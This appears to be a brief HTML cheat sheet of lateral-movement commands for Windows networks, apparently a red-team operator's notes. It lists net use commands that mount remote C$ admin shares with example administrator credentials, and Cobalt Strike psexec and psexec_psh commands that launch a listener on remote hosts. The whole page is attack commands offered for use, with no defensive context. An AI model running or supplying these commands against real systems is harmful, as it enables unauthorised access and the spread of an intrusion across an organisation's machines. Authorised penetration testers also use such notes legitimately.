<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Lateral Movement</title>
</head><body>SharpCom<br/>
<br/>
run net use \\computername\c$ P@ssw0rd &nbsp;/U:computername\administrator<br/>
<br/>
psexec &lt;computername&gt; &lt;listener&gt;<br/>
<br/>
From cobalt strike<br/>
<br/>
run net use \\Server_Name\C$ /user:wsadmin "Workstationadmin1!"<br/>
<br/>
psexec_psh &lt;computer_name&gt; &lt;listener&gt;</body></html>